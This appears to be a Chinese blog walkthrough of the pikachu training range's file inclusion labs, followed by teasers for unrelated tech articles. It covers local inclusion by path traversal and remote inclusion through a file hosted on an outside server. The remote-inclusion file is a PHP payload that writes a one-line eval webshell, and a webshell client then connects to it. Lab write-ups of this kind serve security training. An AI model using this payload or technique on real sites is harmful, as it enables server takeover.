pikachu文件包含漏洞靶场通关攻略

embedded/2024/10/18 12:23:29/

本地文件包含

首先,在靶场根目录下创建一个php文件,内容是phpinfo();

其次,上传一个任意球星图片,会跳转到带有filename参数的php文件下

然后,将filename的参数改为可以访问到我们创建的php文件的地址

../../../../2.php

就可以访问到我们的phpinfo

远程文件包含

在进行远程文件包含时,要先修改两个参数

php.ini下的allow_url_include和allow_url_fopen两个参数改为On,前面的冒号也要删掉

(看自己是什么版本的PHP,要和版本对应)

进行任意图片提交

在云服务器上创建一个2.txt文件  内容是

<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>')?>

就是创建一个shell.php 文件,文件内容为一句话木马

然后,将filename的参数改为我们2.txt的地址

http://47.121.191.208/2.txt

回车后就可以在fileinclude目录下找到我们上传的shell.php文件

接下来使用连接工具进行webshell连接,成功连接


http://www.ppmy.cn/embedded/105534.html

相关文章

Vue 数据监听工作原理及三大重要模块分析

Vue 数据监听 在 Vue 中&#xff0c;数据监听是通过其响应式系统实现的。下面是其工作原理及代码示例&#xff1a; 一、工作原理 对象属性劫持&#xff1a; Vue 使用 Object.defineProperty() 方法来对数据对象的属性进行劫持&#xff08;也称为代理&#xff09;。当访问或修…

C#基础(3)一维数组

前言 我们先前已经进行了枚举的学习&#xff0c;但其实枚举相对来说&#xff0c;设计到的计算逻辑比较少&#xff0c;大多数时候都是和switch一起进行分支判断&#xff0c;而且屏幕前的你应该也发现了&#xff0c;这玩意儿其实更多就是一个编码规范的学习。 但今天我们要开始…

解锁.NET安全奥秘:敏感数据加密与哈希的深度揭秘

在 .NET 应用中保护敏感数据&#xff1a;加密与哈希的深入探讨 随着数字化时代的不断发展&#xff0c;数据安全已经成为企业和开发者面临的首要挑战之一。在 .NET 应用程序中&#xff0c;保护敏感数据不被未授权访问、篡改或泄露至关重要。为此&#xff0c;加密与哈希技术被广…

优化Nginx负载均衡以提升缓存效率的策略与实践

在现代的网络架构中&#xff0c;Nginx 作为一种高性能的 HTTP 服务器和反向代理&#xff0c;广泛用于处理高并发的网络请求。然而&#xff0c;随着用户数量的增加&#xff0c;单一服务器的资源往往难以满足需求&#xff0c;这时就需要引入负载均衡来分散请求压力。本文将探讨如…

SpringBoot开发——初步了解SpringBoot

文章目录 一、SpringBoot简介1、什么是Spring Boot2、Spring Boot的优点3、Spring Boot功能 二、Spring与Spring Boot对比三、Spring Boot与Spring MVC四、Spring Boot体系结构五、Springboot Initializr1、Spring Initializr2、Spring Initializr模块 一、SpringBoot简介 1、…

pytorch利用简单CNN实现葡萄病虫害图片识别

1 前言 之前我开发了一个葡萄病虫害的可视化系统&#xff0c;最近就想给这个系统增加2个功能&#xff0c;一个是对接一个AI助手&#xff0c;可以进行葡萄病虫害的咨询&#xff0c;直接对接千问大模型&#xff0c;这个在之前的博文里已经介绍过对接方法了&#xff0c;第二个是做…

红帽与SUSE对RHEL/CentOS 7系列延长生命周期支持策略:保障企业Linux系统的持续安全与稳定

一、前言 昨天有幸参加了一个活动&#xff0c;其一主办方是SUSE&#xff0c;感谢SUSE的工程师提供相关信息。 在本篇文章中&#xff0c;我们将深入探讨两个关键的Linux操作系统支持方案&#xff1a;“红帽企业版 Linux 7&#xff08;RHEL 7&#xff09;延长生命周期支持”和“…

实现多云对象存储支持:Go 语言实践

实现多云对象存储支持&#xff1a;Go 语言实践 在现代云原生应用开发中&#xff0c;对象存储已成为不可或缺的组件。然而&#xff0c;不同的云服务提供商有各自的对象存储服务和 SDK。本文将介绍如何在 Go 语言中实现一个灵活的对象存储系统&#xff0c;支持多个主流云服务提供…